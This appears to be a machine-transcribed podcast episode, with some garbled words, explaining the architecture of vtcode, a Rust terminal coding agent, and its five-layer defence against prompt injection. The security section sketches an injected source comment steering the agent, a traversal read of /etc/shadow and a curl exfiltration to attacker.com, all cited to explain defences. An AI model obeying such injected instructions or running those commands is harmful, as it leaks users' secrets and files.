Welcome back to the deep dive. So for years now, the whole AI and software development conversation, it's mostly been about coding assistance, right? Tools like Copilot suggesting code, maybe completing simple functions.
Right, the suggestion engines, they're helpful, no doubt.
Yeah, exactly.
Yeah.
But there's this massive shift happening. I feel like we're seeing it accelerate now. We're moving beyond just suggestions.
To actual autonomous agents?
Precisely. Programs that can run complex, multi-step tasks, and not just in some sandbox, but like directly within your private code base.
And crucially, inside your operating system's shell environment. That's the big leap.
That leap, though, it changes everything from a risk perspective, doesn't it?
Oh, absolutely. It's a whole different ballgame. You go from worrying about a slightly buggy suggestion
To worrying about an LLM getting tricked into doing something malicious, like deleting files or running weird network commands.
Exactly. The attack surface expands dramatically. Prompt injection becomes a serious security threat, not just an annoyance.
And that's exactly why we wanted to do this deep dive today. We're looking at vtcode because it feels like a project that really gets this high-stakes environment. It's trying to tackle this problem architecturally from the ground up.
Right. Security isn't an afterthought. It seems baked into the design philosophy.
So our mission today, for you listening, is really a technical dissection. We want to get into the core of vtcode. How does this modularity work? How does it handle all these different LLMs? And most importantly, how do those security layers actually connect to make it, hopefully, an effective and trustworthy agent?
Okay, yeah. Let's dig in. And I think the place to start is really its foundation. What is vtcode?
Good point. It's not like a cloud service you sign up for, is it?
No, not at all. It's a standalone application. It runs in your terminal. You interact with it via the vtcode binary.
Okay, a command line tool.
Exactly. And the whole thing is built in Rust.
Ah, okay. That choice Rust, that immediately tells you something, doesn't it?
It really does. It signals a strong focus. When you're building something that needs to interact directly with the file system, the shell, potentially make network calls, Rust gives you memory safety, performance, robust concurrency handling.
Things you absolutely need if you're serious about security in this kind of application.
Non-negotiables, really. You can't afford memory corruption vulnerabilities when you're running arbitrary commands based on LLM output.
And structurally, the intelligence isn't all crammed into that one binary, right?
No, that's key. The main binary, vtcode, is more of the user-facing shell. The real brains, the orchestration, the tool execution logic, the communication with the LLMs, that all lives in a dedicated library crate. It's called vtcode-core.
Okay, so a clear separation. Binary is the front-end interface. vtcode-core is the powerful, complex back-end doing the heavy lifting.
Exactly. That separation is fundamental to its architecture.
So before we tear apart the crates themselves, maybe we should just outline what this thing is actually designed to do. What are its core capabilities?
Good idea. Because the architecture really flows from the capabilities it needs to support, and it's trying to synthesize quite a few advanced things together.
Okay, what's first on the list?
I'd say the multi-provider LLM abstraction. This is really central.
Abstraction, so handling different AI models.
Yeah, and not just like wrapping one or two APIs. We're talking about a unified interface designed from the start to work with over 8 distinct LLM providers.
Heat. Seriously? Like who?
Well, you've got the big players, OpenAI, Anthropic, Google's Gemini. Then you've got others like xAI, and importantly, local runners like Llama.
Llama for local models, right? So
Right.
a huge range. Why go to that much trouble? Why not just pick one, like GPT-4?
Flexibility and resilience. Vendor lock-in is a killer for this kind of tool. What if OpenAI has an outage right when you need it?
Your agent just stops working.
Exactly. Or what if they change their API, deprecate a model you rely on, or suddenly increase prices dramatically?
You're stuck.
Right. By building this abstraction layer, vtcode aims for maximum redundancy. You can configure it to use multiple providers.
And the sources mentioned automatic failover support. How does that work? Is it just like try OpenAI, if it fails, try Anthropic?
It's more sophisticated than just round robin.
Yeah.
It has to be. Imagine the agent is halfway through a complex refactoring task,
Yeah.
and the primary API, let's say OpenAI, throws a 500 error or maybe a rate limit issue. The system doesn't just give up.
Okay.
It's designed to immediately retry the request, potentially adjusting the context slightly if the token limits are different, using a pre-configured secondary provider. Maybe that's Anthropic, maybe it's Gemini.
Ah, so it needs to know the capabilities and limits of all the providers it might switch to.
Precisely. That abstraction layer has to manage token budgets, feature support, like does this model handle tool calling well, across all those different APIs. It's a complex piece of engineering, but it means the workflow is much less likely to be interrupted. The agent stays available.
Okay, that makes sense. So multi-provider LLM support is foundational. What's next? How does it understand the code itself?
That brings us to semantic code intelligence. It's not just treating code like plain text.
Right, because code has structure.
Exactly. And vtcode leverages tree sitter parsers for this.
Tree sitter, I've heard of that. It builds an abstract syntax tree, right? An AST.
That's the core idea. Instead of seeing def me my function arg, return arg plus 1 as just a sequence of characters.
It sees it as a function definition named my function with an argument arg containing a return statement with a binary operation.
Precisely. It understands the grammar, the structural relationships between the parts of the code.
And why is that so important for an agent?
Reliability. Think about a simple task. Rename the variable count to total count in this Python file.
Okay.
If the agent just uses text search and replace, like regex, it might accidentally rename count inside a comment or within a string literal, or maybe even a variable with the same name but in a completely different scope.
Right. Disaster waiting to happen in a large code base.
But with tree sitter, the agent knows, okay, this specific token is the definition of the variable count in this scope, and these other tokens are usages of that specific variable. It can perform surgical changes.
Much safer. And vtcode uses this for multiple languages.
Yeah, the sources mention Rust, Python, JavaScript, TypeScript, Go, Java, Swift. So pretty broad coverage for common languages. This structural awareness is key for reliable automated refactoring.
And then it adds acid grep on top of that.
Right. SASGREP basically turns that structural understanding into a powerful search tool.
So instead of searching for the text database client.connect,
which might find it in documentation or old code, you can ask the agent, find me all the places where a method named connect is called, but only when the object it's called on is an instance of the database client class.
Ah, much more specific. You're searching based on the code's meaning, not just its characters.
Exactly. This lets the agent find very specific patterns across huge code bases, which you'd need for, say, large-scale API migrations or complex security vulnerability checks.
Okay, so it understands the code deeply. But LLMs have limited context windows.
Yeah.
How does vtcode manage feeding the right information to the model without running out of tokens?
That's the next critical piece. Context management. Context is everything for an LM, but it's also expensive.
Expensive in terms of tokens, and therefore often money.
And performance, yeah. So vtcode needs sophisticated ways to handle this. It includes real-time tracking of the token budget.
Which has to vary depending on which LLM provider is currently active, right?
Mm-hmm.
Since they have different limits and costs.
Exactly. And it employs different strategies for conversation compression.
Compression. What does that mean in this context? Just summarizing.
It can be multifaceted. It might involve summarizing the output of a tool before adding it back to the conversation history so you don't bloat the context with, say, the entire contents of a large file.
Right.
Or, in a long back-and-forth conversation, it might strategically trim older messages, trying to keep the most recent user instructions and the crucial system prompts while staying under the token limit.
So it's actively curating the context.
Right. And they also mentioned prompt caching. If parts of the prompt, like the system instructions or the definitions of the available tools, haven't changed between turns, it can reuse the tokenized version instead of regenerating it. Saves compute, saves tokens.
Clever. So it has LLM access, code intelligence, context management. How does it actually do things in the environment? File, system, shell, etc.
Through the tool system. This is its interface to the outside world, its hands, essentially.
And the key here is that it's a trait-based registry. What does trait-based mean for people not deep into Rust?
Think of a trait in Rust as an interface or a contract. It defines a set of methods that any type implementing that trait must provide.
Okay.
So every tool vtcode can use, whether it's reading a file, read file, writing a file, write file, running a shell command or run terminal cmd, or searching code, grep file, has to implement the tool trait.
Right, though they all look the same from the age's perspective.
From the LLM's perspective, yes, and from the core orchestration logic's perspective. The LLM learns a single, consistent way to request actions using function calls. Regardless of how complex the underlying implementation of read file or run terminal cmd actually is, it standardizes interaction.
And the tools cover those core developer actions.
Right.
File I/O, shell access, search.
Yep. reading, writing, editing files, running bash commands or specific terminal commands, and leveraging those code intelligence features via tools like grepfile and AskGrep.
This cool system feels like, well, the point where things could get dangerous if not handled carefully.
Absolutely. It's the critical junction. The LLM suggests an action, the tool system executes it. We'll definitely need to unpack the security model around this later.
Yeah, Section 4 is all about security. But first, understanding this structure, the LLM abstraction, code intelligence, context management, the tool system, it all points towards a specific architectural philosophy, right?
It does. The entire system is built using a workspace-based architecture. It's not one giant program. It's composed of many specialized crates working together.
Crates being Rust's term for libraries or packages. Why break it down so much? Why not just have one big VT code application?
Several really good reasons. First, reusability and composability.
Meaning?
Well, take the logic for running shell commands safely across different operating systems. That's complex. By putting it in its own crate, say vtcode bash runner.
They could potentially reuse that specific piece in another tool without needing the whole LLM part.
Exactly. It promotes a clean separation of concerns. Each crate does one thing well.
Okay, that makes sense from an engineering perspective. What else?
Dependency management and compilation speed. This is a big one in Rust. When you change code in one small crate, like the configuration loader,
You only need to recompile that crate and anything that directly depends on it, not the entire multi-thousand line application.
right, it speeds up development cycles significantly and keeps the dependency graph cleaner and easier to manage.
Okay, engineering benefits. You mentioned a security reason too.
Yes, auditing and isolation. This is crucial. If your goal is a security-hardened agent, you want to isolate the riskiest operations.
Like shell execution.
Precisely. Putting all shell command execution logic into the dedicated vtcode bash runner crate creates a very clear, well-defined boundary. Security auditors can focus their intense scrutiny on that specific crate, knowing its scope and potential impact are contained. It's much easier to analyze than if that logic were scattered throughout the main application code.
That makes a lot of sense. Isolate the danger zone.
Hmm?
I also saw a mention of a specific crate, vtcode commons. It sounds basic, but the description said it provides shared traits to eliminate circular dependencies. Can you unpack that? Why is that important?
Yeah, that's a sign of mature systems design. A circular dependency is when, say, crate A needs something from crate B, but crate B also needs something from crate A.
Like they both depend on each other.
Exactly. And Rust's build system, Cargo, generally doesn't allow that or makes it very difficult to manage. It creates a tangled mess.
So how does vtcode commons fix this?
It acts as a foundational layer. They pull out the really common basic definitions that many other crates need, things like the definition of the tool trait itself, or maybe common error types, and put them into vtcode commons.
Okay.
Now, both crate A and crate B can depend on vtcode commons to get those basic definitions, but they don't need to depend on each other directly.
It breaks the circle by introducing a neutral third party that everyone relies on.
Exactly. It ensures the dependency flow is hierarchical, generally top-down. The main orchestrator, vtcode-core, can use infrastructure crates, but those infrastructure crates don't need to know anything about the high-level agent logic. It keeps the architecture clean and maintainable.
Okay, philosophy understood. Let's actually walk through the engine room now. Crate by crate. Starting from the outside, the vtcode binary crate.
Right, the entry point. As we said, this one's intentionally thin. Its main job isn't running the agent logic itself.
It's more about handling the user interaction.
Exactly. It's the part that runs when you type v2 code in your terminal. Its first job is parsing the command line arguments.
Using CLAMP, which is pretty standard in the Rust world.
Yeah, very robust library for CLIs. So cli.parse grabs your input. Then it needs to figure out the configuration merging settings from the command line, environment variables, workspace files, global files. We'll get into that precedence later.
Okay.
Once it has the config, it builds what they call the startup context, which holds all that initial setup information. And then based on the command you gave it, like vtcode run or vtcode config, it dispatches the request.
Using a command enum, probably, to route to the right handler function.
Yep, handlers likely living in circli within that crate.
What else lives inside this binary wrapper, besides argument parsing and dispatch?
A few key interaction components. The agent run loop for managing the turn-by-turn execution when you're in an interactive session. There's also the ACP adapter.
ACP, Agent Client Protocol, for IDE integration.
Exactly. That's the specific logic for talking to editors like Zed. And importantly, workspace trust synchronization.
Workspace trust, was that?
It's a security feature. Before the agent even starts running commands in a project directory, the binary wrapper checks if you've marked that specific directory as trusted.
Ah, so you don't accidentally run an autonomous agent on some random code you just cloned from the internet.
Precisely. If it's an untrusted workspace, the agent might operate with severely restricted capabilities or refuse to run at all until you explicitly grant trust. It's a first line of defense happening right in the entry point binary.
Okay, makes sense. Now let's move inward to the heart, the core library, vtcode-core. This is the orchestrator.
This is where the magic happens. All the complex logic resides here. It's broken down into key modules reflecting its responsibilities.
First up, vtcode-core's Intellum. That sounds familiar.
Yeah, this is the implementation hub for that multi-provider LLM abstraction we talked about.
So this module contains the actual LLM provider trait definition.
Correct. And also the universal data structures used for communication. LLM request, what the core sends to the provider module, and LLM response, what the core expects back from any provider module. It standardizes that conversation.
Got it. What's the next key module?
vtcode-core's tools. This is where the tool system is managed.
Okay, so this module contains the tool registry, the lookup table for all available tools.
Exactly. The registry lives here. It also contains the definition of the tool trait that all tools must implement. And importantly, the function declaration structures.
Function declarations, what are those used for?
These are crucial for the LLM interaction. They are essentially these schemas, often in JSON format, that describe each tool to the LLM.
Ah, so it tells the LLM, if you want to use the read file tool, its name is read file, and it takes one argument called path, which must be a string.
Precisely. The LLM needs these detailed declarations so it knows how to correctly format its tool calls in the response. Without them, it's just guessing, which is unreliable.
Okay, LLM interaction tool management. What about the actual agent execution flow?
That's handled in vtcode-core's core agent. This is the runtime engine.
And it contains types like agent, agent runner, task,
Yeah.
task outcome. Sounds like state management.
It is. Think of the agent runner as the state machine. It takes a task, like refactor this function, and manages the lifecycle. It calls the LLM, maybe gets a tool call back, executes the tool, handles user approval if needed, feeds the result back to the LLM, and continues this loop.
Until the task reaches a final state, a task outcome,
Yeah.
which could be success or failure.
Exactly. This structure keeps the core agent runtime logic separate from the specifics of which LLM is being used or how a particular tool is implemented. It just orchestrates the flow based on these defined components.
Very modular. Now, besides the main binary and the core library, there are these other foundational infrastructure crates. These are the ones pulled out for reusability, right?
Yes, and this really highlights the engineering discipline. It's about isolating specific, potentially complex functionalities.
Like vtcode config, just for handling configuration.
Seems simple, but configuration loading, especially with multiple sources and a defined precedence order, can get messy. Putting it in its own crate means config logic is isolated, easily testable, and changes there are less likely to break the core agent runtime.
Makes sense. And then there's the critical one, vtcode bash runner.
This is a prime example of security through isolation. Running shell commands based on LLM input is inherently risky.
Understatement of the year.
Right. So this crate's only job is to handle executing shell commands, dealing with cross-platform differences, PowerShell versus Bash versus Zesh, and crucially, applying necessary safety wrappers and sanitization.
And by isolating it, you create that focused audit boundary we discussed.
Exactly. If you're worried about shell injection vulnerabilities, you know exactly which crate needs the most intense security review. All OS interaction via shell commands goes through this single specialized component.
Okay, what else? There's vtcode indexer.
This crate handles mapping out the user's workspace. It builds and maintains an index of the files and potentially their structure.
Which powers those fast, structure-aware searches using treesitter and AskGrep.
Precisely. Instead of scanning the whole file system every time the agent needs to find something, it queries this internal index. Much faster, especially in large projects.
And the last one mentioned is vtcode exec events. This sounded interesting, maybe more forward-looking.
It really does. This crate defines a schema for structured telemetry events.
Structured telemetry.
Yeah.
So not just printing random log messages.
No. Think clean, well-defined data structures, probably JSON serializable. For every significant action the agent takes, calling a tool, receiving LLM output, getting user approval, it emits an event conforming to this schema.
What kind of data would be in such an event?
Things like Which tool was called, what arguments were provided, what was the outcome, success, failure, how long did it take, how many tokens were consumed for the preceding LLM call.
Wow. Okay. That turns the agent's internal operations into a stream of machine-readable data points.
Exactly, and that structured data layer is incredibly valuable. It transforms ephemeral actions into something auditable, analyzable, and potentially usable for future improvements. We should definitely circle back to the potential of this at the end.
Okay, let's zoom in on the LLM interaction itself. We've talked about the LLM provider abstraction,
Yeah.
but let's really get into the mechanics of that LLM provider trait. How does it achieve that unified interface across so many different models?
The trait is the key. It's the contract. It forces every provider implementation, whether it's for OpenAI, Anthropic, Gemini, or Llama, to expose the same set of core functionalities to the rest of vtcode-core.
So vtcode-core doesn't need to know the specific quirks of the Claude API versus the GPT API.
Not directly, no. It just interacts with the methods defined in the LLM provider trait.
And what are those essential methods?
The sources highlight three main ones. First, there's validate request.
Validate. Why is that needed?
Because, like we said, LLMs aren't all the same. You might be trying to run a complex task that requires sophisticated tool calling capabilities, but the currently configured model is a small, local one via a llama that just doesn't support it well.
So before sending the full request off.
The agent calls validate request on the provider module. This method checks if the model can actually handle the type of requests being made. =G, does it support tool calls? Does it have enough context window? If not, it signals that, allowing the system to potentially fail over to a more capable model before wasting time and tokens on a request doomed to fail.
Smart. Pre-flight check. What are the other methods?
The two main ways to get a response. There's generate, which is typically for synchronous request-response interactions, maybe for a quick internal check or a simple one-shot task where you don't need streaming.
And then the more common one for chat-like interaction, stream.
Right. This handles asynchronous streaming of tokens back to the agent, which is what you see happening in the terminal UI when the agent is typing its response. It allows for that real-time feel.
But the real workhorse is the translation layer within each provider's implementation, right? Because the underlying APIs are all different.
Hugely different. This is where a lot of the implementation complexity lies for supporting a new provider. OpenAI uses a tool calls array in its response JSON. Anthropic has a completely different system using two loose blocks, which might even involve multiple back-and-forth messages. Gemini has its own function call format.
So the code inside, say, the vtcode L Anthropic crate, has to constantly translate.
Exactly. When vtcode-core sends its standardized LM request, the Anthropic module has to translate that into the specific format the Claude API expects. And when the Claude API responds, the module has to parse Anthropic's unique two-loose structure and translate it back into the universal LLM response format that vtcode-core understands.
That sounds tedious.
It is. It's detailed, specific mapping work for every single provider. But doing that work within each provider module is what keeps vtcode-core clean and agnostic. The core logic doesn't care about provider specifics. It just deals with LLM request and LLM response. That's the power of the abstraction.
Okay, so that's how it talks to the brain. Now let's trace a typical interaction. Walk us through the agent turn life cycle, step by step.
All right. This whole cycle is orchestrated by the agent loop within vtcode-core. It defines how the agent takes a turn.
Step 1 is easy. User input, I type something into the terminal.
Right. You provide a prompt via the TUI interacting with the session. That kicks things off.
Step 2, request assembly. What happens here?
The agent loop gathers everything needed to talk to the LLM. It takes your latest input, but also pulls in the relevant conversation history.
Which might be compressed or summarized based on those context settings we discussed.
Exactly. And crucially, it also includes the function declaration schemas for all the tools currently available in the tool registry.
So the LLM knows exactly what tools it has at its disposal and how to call them.
Yes. This whole package, user prompt, history, tool schemas, gets bundled into the universal LM request format.
Step 3, the LLM call. The request goes off to the selected provider via the abstraction layer.
Right. And the provider starts streaming back a response. This will be mostly text tokens, but critically, it might also contain structured data indicating tool calls.
This is the decision point. Does the LLM think it needs to do something?
Precisely. If the response is just text, the turn might end there. But if the LLM says, okay, based on the user's request and the code I've seen, I need to read the file srqtls.py, it will include a formatted tool call in its response.
And that triggers step 4, tool validation and execution. This sounds like where the security layers kick in heavily.
Absolutely critical sequence.
Hmm.
When a tool call comes back from the LLM, first the pipeline checks it against layer 1. Registry lookup, does the tool exist? Does the agent have capability? And layer 2, policy validation, is the command allowed? Are the arguments safe? Path canonicalization happens here.
Assuming it passes those checks, what if it's a sensitive action like writing a file or running git commit?
Then the agent initiates human in the loop, HITL approval, layer 3.
So everything pauses.
Yes. The agent displays the proposed action. I want to run git commit and refactor utility functions directly to the user in the TUI.
And waits for me to say yes or no.
Correct. Only if the user explicitly approves does the agent proceed. Then it passes the validated approved tool call to the appropriate specialized executor, layer 4, to actually perform the action.
And the result of that action, the file content, the output of the command, needs to get back to the LLM, right?
Essential step. The executor captures the result, stud out, starter, file data, etc. This result is formatted into a standardized message.
And then, does the turn end?
No, this is key to autonomy. The agent loop takes that tool result message, automatically appends it to the conversation history, and immediately initiates another call to the LLM using the updated history.
Ah, so it's telling the LLM, okay, I did that thing you asked for. Here's what happened. Now what?
Exactly. It's often called a multi-step reasoning loop, or REACT, reasoning and acting. The LLM gets the information it requested from the external tool, allowing it to continue its thought process based on that new data. This loop, LLM reasons, calls tool, agent executes, feeds result back, LLM reasons again, is how complex tasks get done.
That makes sense. That's how it chains actions together.
Right. Then we get to step 5, UI update. The text responses and tool results are displayed to the user via the session.
And finally, step 6, turn completion. When does the loop stop?
It stops when the LLM, in its response, indicates a finish reason of stop, or maybe an error occurs. It signals that it has completed the current step or the overall task based on its understanding.
Wow. Okay, that's a complex stance.
Yeah,
And it all relies heavily on context management and configuration, which we touched on earlier.
absolutely. The context config settings are vital. Defining that maximum token budget is one thing, but the curation strategy is really important.
How aggressively does it trim old messages versus summarizing them? That impacts its memory.
Exactly. A simple truncation might be cheaper, but lose valuable context. Summarization costs extra LLM calls, but might preserve more long-term understanding. It's a trade-off defined in the configuration.
And we shouldn't forget the system prompts. Where do they fit in?
They're fundamental. They get injected right at the start during session initialization. They set the stage for the entire interaction.
Giving the agent its persona and ground rules.
Yes. Things like, you are an expert Python developer specializing in web frameworks, but also critical operational constraints. Always ask for user approval before executing any shell command. Ensure all file paths are validated before use. These system prompts are the initial guardrails guiding the LLM's behavior before the user even types their first message.
Good. Let's dedicate some serious time now to security. Because, as we've said, giving an LLM agent shell access, it's powerful, but potentially dangerous.
It's the core challenge. The main risk isn't usually a traditional bug in vtcode's Rust code, though that's possible. The bigger, more unique threat is prompt and argument injection.
Right. Tricking the LLM itself.
Exactly. An attacker doesn't need to find a memory leak. They just need to craft input. Maybe a malicious comment in a source file the agent reads, or a cleverly worded user prompt that convinces the LLM to generate a harmful tool call.
Like getting it to output runnerball CMD, LMWARF, or something less obvious but still damaging?
Precisely. Because the LLM's output, the tool call, becomes the input for the execution layer. If that output is malicious, the agent becomes a vector for attack on the user's own system.
So how does vtcode defend against this? You mentioned a defense in depth model, 5 layers.
Yeah, it's a multi-layered approach, assuming that no single layer is perfect. Let's break them down.
Layer 1, registry lookup and capability validation. What happens here?
This is the very first gate. When a tool call like runterrunnelcmd comes from the LLM, the system first checks. Does a tool named runnerrunnelcmd actually exist in the registry?
Simple check. What about capability?
This is more nuanced. Tools are categorized by their potential impact, using a capability level, maybe basic for introspection, file reading, editing, bash for shell commands, code search.
And based on the context, like if it's an untrusted workspace.
The agent might only be allowed basic and filer reading capabilities. So even if the LLM generates a perfectly valid run-terminal CMD call, if the current policy forbids the bash capability, the request is denied right here at layer 1 before any arguments are even looked at.
Okay, first barrier passed. What's layer 2? Policy validation.
This layer digs into the arguments of the tool call. It's about enforcing specific rules on the content.
Like preventing dangerous commands.
Exactly. It enforces a command allow list for shell execution. The sources mentioned it might be as strict as only allowing 9 specific pre-approved safe commands by default, maybe things like else, pwd, get status, grep.
So if the LLM tries to run curl or reget or rub,
It gets blocked immediately by this policy unless the user has explicitly overridden it for that specific command.
what else happens in layer 2? Path canonicalization.
Absolutely critical. This stops directory traversal attacks. Imagine the LLM is tricked into generating read file, etc. shadow.
Trying to read sensitive system files outside the project directory.
Right. Path canonicalization takes that relative path, resolves all the dot segments, follows any symbolic links, and figures out the actual absolute path on the file system it points to.
Okay.
Then the system checks, is this canonicalized absolute path still within the boundaries of the trusted project workspace? If it points outside to etc. shadow or users myuser.ethershid the request is denied. Even if read file itself is allowed, accessing outside the project boundary isn't. This is huge for security.
Definitely. So layers 1 and 2 are automated checks. What if something tricky gets through?
That's where the human comes in. Layer 3, HITL approval, human in the loop.
The user confirmation prompt.
Yes, the system recognizes that automated policies can't catch every edge case or every creative malicious prompt. So for actions deemed sensitive writing files, running non-whitelisted shell commands, maybe accessing the network, the agent pauses.
And asks me, hey, I want to do this specific thing. Is that okay?
Exactly. It presents the exact command or file operation it intends to perform. The user has the final say.
But doesn't that get annoying? If the agent needs to run my test suite repeatedly, do I have to click approve every single time?
That would be frustrating. So vtcode offers persistent policy options. When the approval prompt appears, you don't just get yes, no. You might get options like approve once, just this time, approve for session until I quit vtcode, always approve this specific command with these exact arguments, or deny permanently.
So I can teach it that running cargo test in this project is always okay.
Right. It allows you to balance security with workflow efficiency for trusted, repetitive tasks.
Okay, layer 3 is the human check. What's layer 4? Specialized executors.
Think of this as adding extra safety logic within the implementation of each tool itself. It's defense redundancy.
So the code that actually runs the shell command has its own checks.
Exactly. The vtcode bash runner crate, which is the specialized executor for shell commands, might have internal safeguards. For example, it might always sanitize environment variables before executing the command, regardless of what layer 2 did.
Or the edit file tool.
Might double-check that the target file exists and is actually writable before attempting to apply the changes generated by the LLM, preventing errors and potential data loss. Each tool adds domain-specific robustness.
Makes sense. One last layer. Layer 5. Optional sandbox.
This is the ultimate fallback, the isolation layer. If somehow a malicious command gets past all the previous checks and user approval,
where does it actually run?
Ideally, inside a constrained sandbox environment, separate from the main vtcode process and the user's main operating system environment.
Like a container or a VM?
Could be. The sources mention using something like the Anthropic sandbox runtime as one possibility. The key idea is isolation. The command executes in an environment with limited privileges and, crucially, restricted network access.
Network allow listing.
Yes. The sandbox configuration would typically include a strict allow list of permitted network endpoints. So even if an attacker tricks the agent into running a command like curl data at sensitivefile.txt attacker.com, the sandbox itself would block the outgoing network connection because attacker.com isn't on the allow list.
Wow. Okay, that's comprehensive. So even if the LLM gets completely fooled and the user mistakenly approves, the sandbox can still prevent data exfiltration or other network-based attacks.
That's the goal. It provides a very strong final layer of containment. This whole 5-layer model really shows a deep commitment to mitigating the risks of autonomous agents operating locally.
All right, a system this complex, multiple LLMs, layers of security, all these different crates, it must need a really flexible way to be configured. Let's talk about that configuration system precedence. How does it decide which setting wins?
Yeah, managing config across different scopes is essential. vtcode uses a clear hierarchy. where settings from higher levels override those from lower levels. It merges them.
What's the absolute baseline?
Built-in defaults. These are hard-coded in the application itself. Sensible starting points for everything.
Okay, lowest precedence. What's next?
The global configuration file, typically located at .config vtcode fdt code.tomll on Linux macOS. This is where you set your personal preferences, your default LLM provider, maybe your preferred text editor for manual interventions, your global security strictness level.
So user-level defaults.
Yeah.
Then project-specific settings.
Right. That's the workspace vtcode.tomll file located in the root directory of your project. This has medium precedence.
Why is this important?
Project consistency. Imagine your team decides that for this specific microservice, everyone must use the Anthropic Claude 3 Sonnet model due to its specific reasoning capabilities, or maybe the security policy needs to be stricter for this repo. Putting that in the workspace, vtcode.toml ensures everyone working on the project gets those settings automatically, and the config is version controlled right alongside the code.
Makes sense. Overrides my personal default, but only for this project. What overrides the workspace file?
Environment variables. These have high precedence. Things like setting vtouch provider OpenEye in your shell.
Why are environment variables useful?
Great for CI/CD pipelines, Docker containers, or just quick temporary overrides for a single terminal session without modifying any file.
And the absolute highest precedence. The ultimate override.
Command line arguments. If you explicitly type provider OpenEye when you run vtcode, that setting wins, overriding everything else. Environment variables, workspace files, global files, defaults.
Because the user's immediate explicit instruction should be obeyed above all.
Exactly. The config manager component is responsible for reading from all these sources, if they exist, and merging them according to this strict hierarchy.
And to avoid having one massive, unmanageable config file, they use configuration decomposition.
Right. The configuration isn't just one giant blob. It's broken down into logical structures, likely corresponding to the different crates or modules.
So you'd have like an agent config section.
Yeah, maybe agent config to specify the default model, reasoning parameters. Then tools config for tool-specific settings like timeouts or allow lists. Definitely a security config for all the HITL settings, sandbox options, capability levels, and a context config for setting token budgets and those conversation curation strategies.
Breaking it down makes it much easier to understand, manage, and audit. You can just look at the security config section if that's your concern.
Exactly. Manages complexity.
Okay, let's switch gears to integration. How does vtcode play nice with other tools, specifically IDEs? You mentioned the Agent Client Protocol, ACP.
Right. The goal isn't just to live in the terminal. Modern developers live in their IDEs. ACP is the bridge, designed specifically with the Z editor in mind initially, but potentially adaptable.
How does it work technically?
It runs over standard input-output, co-stereo. When the IDE wants to use vtcode, it launches the vtcode app command. The vtcode binary then switches into this protocol mode, communicating with the IDE over stereo using structured messages, likely JSON RPC or something similar. It becomes a back-end process for the IDE.
And the first thing they do is negotiate capabilities.
Crucial step, capability negotiation. The IDE client tells vtcode what it can do. I have my own file system access APIs. I can display Markdown. I have an integrated terminal.
Why does vtcode need to know that?
So it can delegate tasks appropriately and avoid redundant work. If the IDE says it can handle reading files, vtcode can use that capability.
Which leads to specific proxying.
Exactly. Let's say the agent decides it needs to read main.rs. If the IDE, like Z, has declared it supports file reading via capability negotiation.
vtcode doesn't use its own internal read file tool.
Correct. Instead of vtcode reading the file directly from the disk, which might bypass IDE permissions or virtual file systems, the ACP adapter inside vtcode sends a request back to the IDE saying, please use your fs.read text file function to read main.rs and send me the content.
Ah, so the file I/O happens using the IDE's established mechanisms and security context.
Precisely. It leverages the IDE's trust and permissions model. If the IDE can't read the file, vtcode gets that error back. However, for things the IDE can't do efficiently, like maybe a complex workspace-wide ASCII search, vtcode would fall back to using its own local indexer and tools. It's an intelligent handoff.
Very cool. One more integration point mentioned was the Model Context Protocol, MCP. This sounded like a way to inject external knowledge.
Yeah, MCP is really interesting. It allows other applications or services to act as context providers for VT code, essentially registering themselves as special tools.
So external knowledge sources become tools the agent can query.
Exactly. Imagine you have a large proprietary documentation system within your company, or maybe a detailed project journal managed by another tool like Serena MCP.
Right.
If that system implements the model context protocol, it can register with VT code. When the agent is working on a task and needs information from that specific documentation or journal.
The LLM sees it as just another available tool like read file or grep file, but maybe called query company docs or get journal entry.
Precisely. The LLM can formulate a query, call that MCP tool, and the external system provides the relevant context back into the agent's conversation history.
That's a powerful way to augment the agent's knowledge without needing to fine-tune the base LLM on specialized or private data.
Exactly. It makes the agent much more adaptable to specific organizational or project contexts by allowing pluggable domain-specific knowledge sources. Hashtag TechOutCheckro.
Okay, wrapping this up. This deep dive really paints a picture of VT code as, well, much more than just another coding assistant. It feels like a meticulously engineered execution framework.
I agree. If you distill it down, the key architectural pillars really stand out. First, the solid foundation of Rust, giving you that performance and safety baseline.
Second, that highly decoupled LOM abstraction layer, supporting 8+ providers with failover that provides incredible flexibility and resilience against vendor lock-in or outages.
And third, arguably the most critical differentiator, that comprehensive 5-layer security model, addressing prompt injection head-on with defense in depth.
The commitment to modularity, breaking everything down into specialized crates. It's not just good engineering practice.
It's fundamental to the security story. Isolating components like the bash runner makes auditing feasible. It allows you to build trust in a system that, by its nature, needs significant privileges.
So the real moment here isn't just, wow, an AI can refactor my code. It's more like, wow, here's a system designed to let an AI refactor my code safely and reliably across different models with multiple layers of checks and balances.
It shifts the conversation towards trustworthy, autonomous execution.
And thinking about the future, you highlighted that one infrastructure crate earlier, VT Code exec events, the one that generates structured telemetry.
Yeah, that one feels like it holds a lot of untapped potential. The fact that every significant agent, action tool calls, LLM requests, successes, failures, timings, token counts is being logged not as messy text, but as clean, structured data.
That opens up possibilities beyond just basic logging or debugging, right?
Yeah. Absolutely. So here's something for you, the listener, to think about. We often discuss improving LLMs through massive offline fine-tuning cycles.
Right. Training a whole new version of the model.
But what if you could leverage this real-time structured event stream within the agent itself? Could you build, say, a continuous online auditing or even a self-correction loop?
Meaning?
Imagine the agent tries a tool call, it fails policy validation layer 2, or the tool execution itself returns an error. The structured event captures exactly why it failed. Could a lightweight process, maybe even another smaller LLM call, analyze that specific failure event in real time?
And learn from it immediately.
Potentially. Could it adjust its internal tool use policy or prompting strategy for the next turn based on that immediate feedback? Could this structured telemetry become the basis for a form of rapid, localized reinforcement learning, allowing the agent to continuously refine its own operational behavior and safety alignment while it runs, without waiting for a major model update?
Turning transparency and auditability directly into a mechanism for ongoing automated self-improvement. That's a really interesting thought.
It feels like the logical next step, building on the robust, observable foundation they've created.